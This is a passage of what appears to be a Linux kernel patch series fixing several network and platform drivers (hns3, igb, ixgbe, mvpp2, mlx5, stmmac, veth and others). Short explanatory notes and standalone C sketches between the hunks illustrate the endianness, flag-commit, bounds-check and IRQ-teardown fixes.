+ 	/* tcam_data2 ~ tcam_data7 */
+-	req = (u32 *)req2->tcam_data;
++	req = (__le32 *)req2->tcam_data;
+ 	for (i = 0; i < 6; i++)
+ 		pos += scnprintf(tcam_buf + pos, HCLGE_DBG_TCAM_BUF_SIZE - pos,
+-				 "%08x\n", *req++);
++				 "%08x\n", le32_to_cpu(*req++));
+ 
+ 	/* tcam_data8 ~ tcam_data12 */
+-	req = (u32 *)req3->tcam_data;
++	req = (__le32 *)req3->tcam_data;
+ 	for (i = 0; i < 5; i++)
+ 		pos += scnprintf(tcam_buf + pos, HCLGE_DBG_TCAM_BUF_SIZE - pos,
+-				 "%08x\n", *req++);
++				 "%08x\n", le32_to_cpu(*req++));
+ 
+ 	return ret;
+ }
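
The hclge_dbg_fd_tcam_read() change is an endianness fix: the TCAM
words come back little-endian from the device, so each must pass
through le32_to_cpu() before being printed; dereferencing them as
plain u32 only happens to work on little-endian hosts. A portable
stand-in for the conversion, assuming little-endian input bytes:

#include <stdint.h>
#include <stdio.h>

static uint32_t le32_to_host(const uint8_t *p)
{
	return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
	       ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

int main(void)
{
	/* Two little-endian words as they would sit in tcam_data. */
	uint8_t raw[8] = { 0x78, 0x56, 0x34, 0x12,
			   0xf0, 0xde, 0xbc, 0x9a };
	int i;

	for (i = 0; i < 2; i++)
		printf("%08x\n", le32_to_host(raw + 4 * i));
	return 0;	/* prints 12345678 then 9abcdef0 on any host */
}
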
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 84ecd8b9be48c..884e45fb6b72e 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -11132,6 +11132,7 @@ static void hclge_get_mdix_mode(struct hnae3_handle *handle,
+ 
+ static void hclge_info_show(struct hclge_dev *hdev)
+ {
++	struct hnae3_handle *handle = &hdev->vport->nic;
+ 	struct device *dev = &hdev->pdev->dev;
+ 
+ 	dev_info(dev, "PF info begin:\n");
+@@ -11148,9 +11149,9 @@ static void hclge_info_show(struct hclge_dev *hdev)
+ 	dev_info(dev, "This is %s PF\n",
+ 		 hdev->flag & HCLGE_FLAG_MAIN ? "main" : "not main");
+ 	dev_info(dev, "DCB %s\n",
+-		 hdev->flag & HCLGE_FLAG_DCB_ENABLE ? "enable" : "disable");
++		 handle->kinfo.tc_info.dcb_ets_active ? "enable" : "disable");
+ 	dev_info(dev, "MQPRIO %s\n",
+-		 hdev->flag & HCLGE_FLAG_MQPRIO_ENABLE ? "enable" : "disable");
++		 handle->kinfo.tc_info.mqprio_active ? "enable" : "disable");
+ 	dev_info(dev, "Default tx spare buffer size: %u\n",
+ 		 hdev->tx_spare_buf_size);
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+index 13f23d606e77b..f6fef790e16c1 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+@@ -916,8 +916,6 @@ struct hclge_dev {
+ 
+ #define HCLGE_FLAG_MAIN			BIT(0)
+ #define HCLGE_FLAG_DCB_CAPABLE		BIT(1)
+-#define HCLGE_FLAG_DCB_ENABLE		BIT(2)
+-#define HCLGE_FLAG_MQPRIO_ENABLE	BIT(3)
+ 	u32 flag;
+ 
+ 	u32 pkt_buf_size; /* Total pf buf size for tx/rx */
+diff --git a/drivers/net/ethernet/intel/igb/igb.h b/drivers/net/ethernet/intel/igb/igb.h
+index 015b781441149..a2b759531cb7b 100644
+--- a/drivers/net/ethernet/intel/igb/igb.h
++++ b/drivers/net/ethernet/intel/igb/igb.h
+@@ -34,11 +34,11 @@ struct igb_adapter;
+ /* TX/RX descriptor defines */
+ #define IGB_DEFAULT_TXD		256
+ #define IGB_DEFAULT_TX_WORK	128
+-#define IGB_MIN_TXD		80
++#define IGB_MIN_TXD		64
+ #define IGB_MAX_TXD		4096
+ 
+ #define IGB_DEFAULT_RXD		256
+-#define IGB_MIN_RXD		80
++#define IGB_MIN_RXD		64
+ #define IGB_MAX_RXD		4096
+ 
+ #define IGB_DEFAULT_ITR		3 /* dynamic */
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index d0ead18ec0266..45ce4ed16146e 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -3877,8 +3877,9 @@ static void igb_probe_vfs(struct igb_adapter *adapter)
+ 	struct pci_dev *pdev = adapter->pdev;
+ 	struct e1000_hw *hw = &adapter->hw;
+ 
+-	/* Virtualization features not supported on i210 family. */
+-	if ((hw->mac.type == e1000_i210) || (hw->mac.type == e1000_i211))
++	/* Virtualization features not supported on i210 and 82580 family. */
++	if ((hw->mac.type == e1000_i210) || (hw->mac.type == e1000_i211) ||
++	    (hw->mac.type == e1000_82580))
+ 		return;
+ 
+ 	/* Of the below we really only want the effect of getting
+diff --git a/drivers/net/ethernet/intel/igbvf/igbvf.h b/drivers/net/ethernet/intel/igbvf/igbvf.h
+index 57d39ee00b585..7b83678ba83a6 100644
+--- a/drivers/net/ethernet/intel/igbvf/igbvf.h
++++ b/drivers/net/ethernet/intel/igbvf/igbvf.h
+@@ -39,11 +39,11 @@ enum latency_range {
+ /* Tx/Rx descriptor defines */
+ #define IGBVF_DEFAULT_TXD	256
+ #define IGBVF_MAX_TXD		4096
+-#define IGBVF_MIN_TXD		80
++#define IGBVF_MIN_TXD		64
+ 
+ #define IGBVF_DEFAULT_RXD	256
+ #define IGBVF_MAX_RXD		4096
+-#define IGBVF_MIN_RXD		80
++#define IGBVF_MIN_RXD		64
+ 
+ #define IGBVF_MIN_ITR_USECS	10 /* 100000 irq/sec */
+ #define IGBVF_MAX_ITR_USECS	10000 /* 100    irq/sec */
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index f83cbc4a1afa8..d3b17aa1d1a83 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -354,11 +354,11 @@ static inline u32 igc_rss_type(const union igc_adv_rx_desc *rx_desc)
+ /* TX/RX descriptor defines */
+ #define IGC_DEFAULT_TXD		256
+ #define IGC_DEFAULT_TX_WORK	128
+-#define IGC_MIN_TXD		80
++#define IGC_MIN_TXD		64
+ #define IGC_MAX_TXD		4096
+ 
+ #define IGC_DEFAULT_RXD		256
+-#define IGC_MIN_RXD		80
++#define IGC_MIN_RXD		64
+ #define IGC_MAX_RXD		4096
+ 
+ /* Supported Rx Buffer Sizes */
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ptp.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ptp.c
+index f8605f57bd067..75e1383263c1e 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ptp.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ptp.c
+@@ -995,6 +995,7 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 	u32 tsync_tx_ctl = IXGBE_TSYNCTXCTL_ENABLED;
+ 	u32 tsync_rx_ctl = IXGBE_TSYNCRXCTL_ENABLED;
+ 	u32 tsync_rx_mtrl = PTP_EV_PORT << 16;
++	u32 aflags = adapter->flags;
+ 	bool is_l2 = false;
+ 	u32 regval;
+ 
+@@ -1012,20 +1013,20 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 	case HWTSTAMP_FILTER_NONE:
+ 		tsync_rx_ctl = 0;
+ 		tsync_rx_mtrl = 0;
+-		adapter->flags &= ~(IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				    IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
++		aflags &= ~(IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
++			    IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		break;
+ 	case HWTSTAMP_FILTER_PTP_V1_L4_SYNC:
+ 		tsync_rx_ctl |= IXGBE_TSYNCRXCTL_TYPE_L4_V1;
+ 		tsync_rx_mtrl |= IXGBE_RXMTRL_V1_SYNC_MSG;
+-		adapter->flags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
++		aflags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
++			   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		break;
+ 	case HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ:
+ 		tsync_rx_ctl |= IXGBE_TSYNCRXCTL_TYPE_L4_V1;
+ 		tsync_rx_mtrl |= IXGBE_RXMTRL_V1_DELAY_REQ_MSG;
+-		adapter->flags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
++		aflags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
++			   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		break;
+ 	case HWTSTAMP_FILTER_PTP_V2_EVENT:
+ 	case HWTSTAMP_FILTER_PTP_V2_L2_EVENT:
+@@ -1039,8 +1040,8 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 		tsync_rx_ctl |= IXGBE_TSYNCRXCTL_TYPE_EVENT_V2;
+ 		is_l2 = true;
+ 		config->rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+-		adapter->flags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
++		aflags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
++			   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		break;
+ 	case HWTSTAMP_FILTER_PTP_V1_L4_EVENT:
+ 	case HWTSTAMP_FILTER_NTP_ALL:
+@@ -1051,7 +1052,7 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 		if (hw->mac.type >= ixgbe_mac_X550) {
+ 			tsync_rx_ctl |= IXGBE_TSYNCRXCTL_TYPE_ALL;
+ 			config->rx_filter = HWTSTAMP_FILTER_ALL;
+-			adapter->flags |= IXGBE_FLAG_RX_HWTSTAMP_ENABLED;
++			aflags |= IXGBE_FLAG_RX_HWTSTAMP_ENABLED;
+ 			break;
+ 		}
+ 		fallthrough;
+@@ -1062,8 +1063,6 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 		 * Delay_Req messages and hardware does not support
+ 		 * timestamping all packets => return error
+ 		 */
+-		adapter->flags &= ~(IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				    IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		config->rx_filter = HWTSTAMP_FILTER_NONE;
+ 		return -ERANGE;
+ 	}
+@@ -1095,8 +1094,8 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 			       IXGBE_TSYNCRXCTL_TYPE_ALL |
+ 			       IXGBE_TSYNCRXCTL_TSIP_UT_EN;
+ 		config->rx_filter = HWTSTAMP_FILTER_ALL;
+-		adapter->flags |= IXGBE_FLAG_RX_HWTSTAMP_ENABLED;
+-		adapter->flags &= ~IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER;
++		aflags |= IXGBE_FLAG_RX_HWTSTAMP_ENABLED;
++		aflags &= ~IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER;
+ 		is_l2 = true;
+ 		break;
+ 	default:
+@@ -1129,6 +1128,9 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 
+ 	IXGBE_WRITE_FLUSH(hw);
+ 
++	/* configure adapter flags only when HW is actually configured */
++	adapter->flags = aflags;
++
+ 	/* clear TX/RX time stamp registers, just to be sure */
+ 	ixgbe_ptp_clear_tx_timestamp(adapter);
+ 	IXGBE_READ_REG(hw, IXGBE_RXSTMPH);
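
The ixgbe_ptp hunk above applies a stage-and-commit pattern: flag changes are accumulated in the local copy aflags and written back to adapter->flags only after the hardware has actually been programmed, so an early -ERANGE return can no longer leave the software flags out of sync with the device. A minimal userspace sketch of the same idiom, using hypothetical names (device_flags, program_hw) rather than the driver's API:

#include <stdbool.h>
#include <stdio.h>

#define FLAG_RX_TS_ENABLED  (1u << 0)
#define FLAG_RX_TS_REGISTER (1u << 1)

static unsigned int device_flags;	/* committed software state */

/* Pretend to program the device; may reject the mode before touching HW. */
static bool program_hw(int filter, unsigned int *staged)
{
	switch (filter) {
	case 0:					/* timestamping off */
		*staged &= ~(FLAG_RX_TS_ENABLED | FLAG_RX_TS_REGISTER);
		break;
	case 1:					/* a supported filter */
		*staged |= FLAG_RX_TS_ENABLED | FLAG_RX_TS_REGISTER;
		break;
	default:
		return false;			/* reject: nothing written */
	}
	/* ... register writes would happen here ... */
	return true;
}

static int set_timestamp_mode(int filter)
{
	unsigned int staged = device_flags;	/* work on a local copy */

	if (!program_hw(filter, &staged))
		return -1;			/* device_flags untouched */

	device_flags = staged;			/* commit only on success */
	return 0;
}

int main(void)
{
	set_timestamp_mode(99);			/* fails; state unchanged */
	printf("flags after bad mode:  %#x\n", device_flags);
	set_timestamp_mode(1);
	printf("flags after good mode: %#x\n", device_flags);
	return 0;
}
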
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+index b399bdb1ca362..f936640cca4e6 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+@@ -5578,6 +5578,11 @@ static int mvpp2_ethtool_get_rxnfc(struct net_device *dev,
+ 		break;
+ 	case ETHTOOL_GRXCLSRLALL:
+ 		for (i = 0; i < MVPP2_N_RFS_ENTRIES_PER_FLOW; i++) {
++			if (loc == info->rule_cnt) {
++				ret = -EMSGSIZE;
++				break;
++			}
++
+ 			if (port->rfs_rules[i])
+ 				rules[loc++] = i;
+ 		}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index c85e0180d96da..1f3a8cf42765e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -834,6 +834,21 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 	return 0;
+ }
+ 
++static void nix_get_aq_req_smq(struct rvu *rvu, struct nix_aq_enq_req *req,
++			       u16 *smq, u16 *smq_mask)
++{
++	struct nix_cn10k_aq_enq_req *aq_req;
++
++	if (!is_rvu_otx2(rvu)) {
++		aq_req = (struct nix_cn10k_aq_enq_req *)req;
++		*smq = aq_req->sq.smq;
++		*smq_mask = aq_req->sq_mask.smq;
++	} else {
++		*smq = req->sq.smq;
++		*smq_mask = req->sq_mask.smq;
++	}
++}
++
+ static int rvu_nix_blk_aq_enq_inst(struct rvu *rvu, struct nix_hw *nix_hw,
+ 				   struct nix_aq_enq_req *req,
+ 				   struct nix_aq_enq_rsp *rsp)
+@@ -845,6 +860,7 @@ static int rvu_nix_blk_aq_enq_inst(struct rvu *rvu, struct nix_hw *nix_hw,
+ 	struct rvu_block *block;
+ 	struct admin_queue *aq;
+ 	struct rvu_pfvf *pfvf;
++	u16 smq, smq_mask;
+ 	void *ctx, *mask;
+ 	bool ena;
+ 	u64 cfg;
+@@ -916,13 +932,14 @@ static int rvu_nix_blk_aq_enq_inst(struct rvu *rvu, struct nix_hw *nix_hw,
+ 	if (rc)
+ 		return rc;
+ 
++	nix_get_aq_req_smq(rvu, req, &smq, &smq_mask);
+ 	/* Check if the SMQ pointed to by the SQ belongs to this PF/VF */
+ 	if (req->ctype == NIX_AQ_CTYPE_SQ &&
+ 	    ((req->op == NIX_AQ_INSTOP_INIT && req->sq.ena) ||
+ 	     (req->op == NIX_AQ_INSTOP_WRITE &&
+-	      req->sq_mask.ena && req->sq_mask.smq && req->sq.ena))) {
++	      req->sq_mask.ena && req->sq.ena && smq_mask))) {
+ 		if (!is_valid_txschq(rvu, blkaddr, NIX_TXSCH_LVL_SMQ,
+-				     pcifunc, req->sq.smq))
++				     pcifunc, smq))
+ 			return NIX_AF_ERR_AQ_ENQUEUE;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 7e318133423a9..0ac5ae16308f6 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -2698,6 +2698,9 @@ static int mtk_hwlro_get_fdir_all(struct net_device *dev,
+ 	int i;
+ 
+ 	for (i = 0; i < MTK_MAX_LRO_IP_CNT; i++) {
++		if (cnt == cmd->rule_cnt)
++			return -EMSGSIZE;
++
+ 		if (mac->hwlro_ip[i]) {
+ 			rule_locs[cnt] = i;
+ 			cnt++;
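
The mvpp2 and mtk_eth_soc hunks above fix the same class of bug: when copying active rule indices into the caller-sized rule_locs[] array, the cursor is now checked against rule_cnt before each write and -EMSGSIZE is returned instead of writing past the end of the buffer. A generic sketch of the guard, with a hypothetical collect_rules() helper:

#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

#define N_SLOTS 8

static const bool slot_active[N_SLOTS] = { true, false, true, true };

/* Copy indices of active slots into out[], never exceeding out_cnt. */
static int collect_rules(unsigned int *out, unsigned int out_cnt)
{
	unsigned int i, loc = 0;

	for (i = 0; i < N_SLOTS; i++) {
		if (!slot_active[i])
			continue;
		if (loc == out_cnt)		/* caller's buffer is full */
			return -EMSGSIZE;
		out[loc++] = i;
	}
	return (int)loc;
}

int main(void)
{
	unsigned int locs[2];
	int n = collect_rules(locs, 2);		/* 3 active rules, room for 2 */

	printf("collect_rules: %d\n", n);	/* negative errno on overflow */
	return 0;
}
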
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+index 72b61f66df37a..cd15d36b1507e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+@@ -97,7 +97,6 @@ int mlx5e_tc_set_attr_rx_tun(struct mlx5e_tc_flow *flow,
+ #if IS_ENABLED(CONFIG_INET) && IS_ENABLED(CONFIG_IPV6)
+ 	else if (ip_version == 6) {
+ 		int ipv6_size = MLX5_FLD_SZ_BYTES(ipv6_layout, ipv6);
+-		struct in6_addr zerov6 = {};
+ 
+ 		daddr = MLX5_ADDR_OF(fte_match_param, spec->match_value,
+ 				     outer_headers.dst_ipv4_dst_ipv6.ipv6_layout.ipv6);
+@@ -105,8 +104,8 @@ int mlx5e_tc_set_attr_rx_tun(struct mlx5e_tc_flow *flow,
+ 				     outer_headers.src_ipv4_src_ipv6.ipv6_layout.ipv6);
+ 		memcpy(&tun_attr->dst_ip.v6, daddr, ipv6_size);
+ 		memcpy(&tun_attr->src_ip.v6, saddr, ipv6_size);
+-		if (!memcmp(&tun_attr->dst_ip.v6, &zerov6, sizeof(zerov6)) ||
+-		    !memcmp(&tun_attr->src_ip.v6, &zerov6, sizeof(zerov6)))
++		if (ipv6_addr_any(&tun_attr->dst_ip.v6) ||
++		    ipv6_addr_any(&tun_attr->src_ip.v6))
+ 			return 0;
+ 	}
+ #endif
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+index 5e0f7d96aac51..d136360ac6a98 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+@@ -123,18 +123,32 @@ out:
+ 	return ret;
+ }
+ 
+-static void irq_release(struct mlx5_irq *irq)
++/* mlx5_system_free_irq - Free an IRQ
++ * @irq: IRQ to free
++ *
++ * Free the IRQ and other resources such as rmap from the system.
++ * BUT it doesn't free the mlx5 object or remove mlx5's reference to it.
++ * This function is very important for the shutdown flow, where we need to
++ * clean up system resources but keep mlx5 objects alive,
++ * see mlx5_irq_table_free_irqs().
++ */
++static void mlx5_system_free_irq(struct mlx5_irq *irq)
+ {
+-	struct mlx5_irq_pool *pool = irq->pool;
+-
+-	xa_erase(&pool->irqs, irq->index);
+ 	/* free_irq requires that affinity_hint and rmap will be cleared
+ 	 * before calling it. This is why there is asymmetry with set_rmap
+ 	 * which should be called after alloc_irq but before request_irq.
+ 	 */
+ 	irq_update_affinity_hint(irq->irqn, NULL);
+-	free_cpumask_var(irq->mask);
+ 	free_irq(irq->irqn, &irq->nh);
++}
++
++static void irq_release(struct mlx5_irq *irq)
++{
++	struct mlx5_irq_pool *pool = irq->pool;
++
++	xa_erase(&pool->irqs, irq->index);
++	mlx5_system_free_irq(irq);
++	free_cpumask_var(irq->mask);
+ 	kfree(irq);
+ }
+ 
+@@ -597,7 +611,7 @@ static void mlx5_irq_pool_free_irqs(struct mlx5_irq_pool *pool)
+ 	unsigned long index;
+ 
+ 	xa_for_each(&pool->irqs, index, irq)
+-		free_irq(irq->irqn, &irq->nh);
++		mlx5_system_free_irq(irq);
+ }
+ 
+ static void mlx5_irq_pools_free_irqs(struct mlx5_irq_table *table)
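
The mlx5 hunk above factors the system-facing half of IRQ teardown (affinity hint, free_irq()) out of irq_release() into mlx5_system_free_irq(), so the shutdown path can release kernel resources while keeping the driver's own objects alive. A rough sketch of the split, with hypothetical names and printf() standing in for the real teardown calls:

#include <stdio.h>
#include <stdlib.h>

struct irq_obj {
	int irqn;
	char *mask;		/* driver-private allocation */
};

/* System-facing teardown only: stand-in for free_irq() and friends. */
static void system_free_irq(struct irq_obj *irq)
{
	printf("free_irq(%d)\n", irq->irqn);
}

/* Full teardown: system half first, then driver-private state. */
static void irq_release(struct irq_obj *irq)
{
	system_free_irq(irq);
	free(irq->mask);
	free(irq);
}

int main(void)
{
	struct irq_obj *irq = malloc(sizeof(*irq));

	if (!irq)
		return 1;
	irq->irqn = 42;
	irq->mask = malloc(16);

	irq_release(irq);	/* normal path: everything goes */

	/* A shutdown path would call only system_free_irq() per object,
	 * leaving the objects themselves alive for later cleanup. */
	return 0;
}
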
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index a07bcb2f5d2e2..1559a4dafd413 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -2692,9 +2692,7 @@ static int stmmac_tx_clean(struct stmmac_priv *priv, int budget, u32 queue)
+ 
+ 	/* We still have pending packets, let's call for a new scheduling */
+ 	if (tx_q->dirty_tx != tx_q->cur_tx)
+-		hrtimer_start(&tx_q->txtimer,
+-			      STMMAC_COAL_TIMER(priv->tx_coal_timer[queue]),
+-			      HRTIMER_MODE_REL);
++		stmmac_tx_timer_arm(priv, queue);
+ 
+ 	__netif_tx_unlock_bh(netdev_get_tx_queue(priv->dev, queue));
+ 
+@@ -2975,9 +2973,13 @@ static int stmmac_init_dma_engine(struct stmmac_priv *priv)
+ static void stmmac_tx_timer_arm(struct stmmac_priv *priv, u32 queue)
+ {
+ 	struct stmmac_tx_queue *tx_q = &priv->dma_conf.tx_queue[queue];
++	u32 tx_coal_timer = priv->tx_coal_timer[queue];
++
++	if (!tx_coal_timer)
++		return;
+ 
+ 	hrtimer_start(&tx_q->txtimer,
+-		      STMMAC_COAL_TIMER(priv->tx_coal_timer[queue]),
++		      STMMAC_COAL_TIMER(tx_coal_timer),
+ 		      HRTIMER_MODE_REL);
+ }
+ 
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 059d610901d84..fc1458f96e170 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -2628,6 +2628,9 @@ static int r8152_poll(struct napi_struct *napi, int budget)
+ 	struct r8152 *tp = container_of(napi, struct r8152, napi);
+ 	int work_done;
+ 
++	if (!budget)
++		return 0;
++
+ 	work_done = rx_bottom(tp, budget);
+ 
+ 	if (work_done < budget) {
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index 727b9278b9fe5..36c5a41f84e44 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -313,6 +313,7 @@ static netdev_tx_t veth_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct veth_priv *rcv_priv, *priv = netdev_priv(dev);
+ 	struct veth_rq *rq = NULL;
++	int ret = NETDEV_TX_OK;
+ 	struct net_device *rcv;
+ 	int length = skb->len;
+ 	bool use_napi = false;
+@@ -345,6 +346,7 @@ static netdev_tx_t veth_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	} else {
+ drop:
+ 		atomic64_inc(&priv->dropped);
++		ret = NET_XMIT_DROP;
+ 	}
+ 
+ 	if (use_napi)
+@@ -352,7 +354,7 @@ drop:
+ 
+ 	rcu_read_unlock();
+ 
+-	return NETDEV_TX_OK;
++	return ret;
+ }
+ 
+ static u64 veth_stats_tx(struct net_device *dev, u64 *packets, u64 *bytes)
+diff --git a/drivers/parisc/led.c b/drivers/parisc/led.c
+index 8bdc5e043831c..3737c1021f88b 100644
+--- a/drivers/parisc/led.c
++++ b/drivers/parisc/led.c
+@@ -56,8 +56,8 @@
+ static int led_type __read_mostly = -1;
+ static unsigned char lastleds;	/* LED state from most recent update */
+ static unsigned int led_heartbeat __read_mostly = 1;
+-static unsigned int led_diskio    __read_mostly = 1;
+-static unsigned int led_lanrxtx   __read_mostly = 1;
++static unsigned int led_diskio    __read_mostly;
++static unsigned int led_lanrxtx   __read_mostly;
+ static char lcd_text[32]          __read_mostly;
+ static char lcd_text_default[32]  __read_mostly;
+ static int  lcd_no_led_support    __read_mostly = 0; /* KittyHawk doesn't support LED on its LCD */
+diff --git a/drivers/pinctrl/intel/pinctrl-cherryview.c b/drivers/pinctrl/intel/pinctrl-cherryview.c
+index 0d6b5fab2f7e4..de07b0837a04f 100644
+--- a/drivers/pinctrl/intel/pinctrl-cherryview.c
++++ b/drivers/pinctrl/intel/pinctrl-cherryview.c
+@@ -1698,7 +1698,6 @@ static int chv_pinctrl_probe(struct platform_device *pdev)
+ 	struct intel_community_context *cctx;
+ 	struct intel_community *community;
+ 	struct device *dev = &pdev->dev;
+-	struct acpi_device *adev = ACPI_COMPANION(dev);
+ 	struct intel_pinctrl *pctrl;
+ 	acpi_status status;
+ 	unsigned int i;
+@@ -1766,7 +1765,7 @@ static int chv_pinctrl_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	status = acpi_install_address_space_handler(adev->handle,
++	status = acpi_install_address_space_handler(ACPI_HANDLE(dev),
+ 					community->acpi_space_id,
+ 					chv_pinctrl_mmio_access_handler,
+ 					NULL, pctrl);
+@@ -1783,7 +1782,7 @@ static int chv_pinctrl_remove(struct platform_device *pdev)
+ 	struct intel_pinctrl *pctrl = platform_get_drvdata(pdev);
+ 	const struct intel_community *community = &pctrl->communities[0];
+ 
+-	acpi_remove_address_space_handler(ACPI_COMPANION(&pdev->dev),
++	acpi_remove_address_space_handler(ACPI_HANDLE(&pdev->dev),
+ 					  community->acpi_space_id,
+ 					  chv_pinctrl_mmio_access_handler);
+ 
+diff --git a/drivers/platform/mellanox/Kconfig b/drivers/platform/mellanox/Kconfig
+index 382793e73a60a..30b50920b278c 100644
+--- a/drivers/platform/mellanox/Kconfig
++++ b/drivers/platform/mellanox/Kconfig
+@@ -80,8 +80,8 @@ config MLXBF_PMC
+ 
+ config NVSW_SN2201
+ 	tristate "Nvidia SN2201 platform driver support"
+-	depends on HWMON
+-	depends on I2C
++	depends on HWMON && I2C
++	depends on ACPI || COMPILE_TEST
+ 	select REGMAP_I2C
+ 	help
+ 	  This driver provides support for the Nvidia SN2201 platform.
+diff --git a/drivers/platform/mellanox/mlxbf-pmc.c b/drivers/platform/mellanox/mlxbf-pmc.c
+index be967d797c28e..2d4bbe99959ef 100644
+--- a/drivers/platform/mellanox/mlxbf-pmc.c
++++ b/drivers/platform/mellanox/mlxbf-pmc.c
+@@ -191,6 +191,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_smgen_events[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_trio_events_1[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0xa0, "TPIO_DATA_BEAT" },
+ 	{ 0xa1, "TDMA_DATA_BEAT" },
+ 	{ 0xa2, "MAP_DATA_BEAT" },
+@@ -214,6 +215,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_trio_events_1[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_trio_events_2[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0xa0, "TPIO_DATA_BEAT" },
+ 	{ 0xa1, "TDMA_DATA_BEAT" },
+ 	{ 0xa2, "MAP_DATA_BEAT" },
